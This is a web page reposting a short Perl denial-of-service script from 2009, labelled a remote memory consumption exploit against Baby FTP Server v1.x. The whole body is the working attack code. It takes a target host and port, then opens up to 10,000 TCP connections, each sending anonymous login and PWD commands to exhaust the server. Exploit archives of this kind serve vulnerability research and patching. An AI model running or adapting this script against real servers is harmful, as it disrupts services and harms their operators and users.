Home / os / win10

baby-dos.txt

Posted on 07 April 2009

#!/usr/bin/perl # # Baby FTP Server v1.x Remote Memory Consumption Exploit. # # ------------------------------------------------------- # This can be exploited to use 100% UC. # Tested with Windows xp sp2 # ------------------------------------------------------- # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.shell-storm.org use IO::Socket; print "[+] Author : Jonathan Salwan "; print "[+] Soft : Baby FTP Server v1.x "; print "[+] Exploit: Remote Memory Consumption Exploit "; if (@ARGV < 1) { print "[-] Usage: <file.pl> <host> <port> "; print "[-] Exemple: file.pl 127.0.0.1 21 "; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; print "[+] Sending request... "; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed! "; for($i=0;$i<10000;$i++) { $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[+]Done! $ip => 100% UC used "; print $socket "USER anonymous "; print $socket "PASS a "; print $socket "PWD "; close($socket); } print "[+]Done! $ip => 100% UC used ";

 

TOP

Malware :